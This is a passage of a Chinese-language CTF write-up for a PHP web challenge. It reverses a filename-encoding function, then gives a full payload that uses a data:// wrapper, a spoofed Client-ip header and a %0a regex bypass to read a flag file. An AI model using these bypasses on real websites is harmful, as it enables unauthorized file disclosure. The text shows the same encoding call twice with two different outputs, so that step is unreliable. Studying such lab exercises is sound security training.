for($i=0;$i<strlen($v);$i++){
$re .= chr(ord($v[$i])-$i*2);
}
return base64_encode($re);
}
调用这个函数对我们想读取的文件进行加密就行了:
var_dump(unchange('index.php'));
#得到:string(12) "aWxgX3AkZFpg"
var_dump(unchange('index.php'));
#得到:string(12) "ZmpdYSZmXGI="
优先读取flag,完整的payload如下:
GET:?2333=data:text/plain,todat is a happy day&file=ZmpdYSZmXGI=
header: Client-ip : 127.0.0.1
return: # 注释内扒拉出源代码
<?php
$flag = 'flag{5843a57f-3446-425c-9a56-d3e1e1fabb51}';
echo "Flag is here~But how to get it?";
?>
总结
file_get_contents()
# 利用点:
/*
伪协议:
data://text,plain,.....
data://text,plain;base64,....
*/
header
# 数据头本地IP地址字段的爆破
php编码机制
# b u p t=23333%0a
# https://www.freebuf.com/articles/web/213359.html
%0a换行绕过
# preg_match匹配,正则表达式形如这个/^23333$/ ==> /^....$/
JSFuck解码js编码的()+[]!
# console.log输出这个编码的结果
# 浏览器console直接输出这个 ()+[]! 编码的执行结果
# 在线执行:https://jsfuck.com/